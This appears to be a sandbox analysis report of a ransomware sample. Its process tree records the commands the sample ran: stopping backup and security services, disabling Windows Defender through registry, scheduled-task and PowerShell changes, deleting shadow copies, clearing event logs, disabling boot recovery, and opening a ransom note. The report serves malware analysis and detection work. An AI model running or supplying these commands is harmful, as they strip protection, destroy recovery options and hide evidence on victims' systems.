a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe 61
Processes
-
C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe"C:\Users\Admin\AppData\Local\Temp\a52f2466b639cb8379bfc3d324d3a274049ebc0c4dfe269afb4774e0813ba643.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:516
-
-
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:556
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1732
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:604
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:276
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1000
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1996
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1360
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1364
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:2028
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:932
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1148
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:920
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1752
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1156
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1572
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1916
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1920
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:544
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1732
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:776
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1108
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1780
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:836
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2004
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1300
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1776
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1708
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:880
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1684
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1600
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1696
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1584
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:556
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1860
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:276
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1000
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1360
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:952
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1692
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1960
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1160
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:516
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1728
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:648
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1512
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2008
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1948
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:860
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1272
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:896
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:684
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1504
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1096
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1724
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2068
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2100
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2172
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2192
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\qj7U_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2556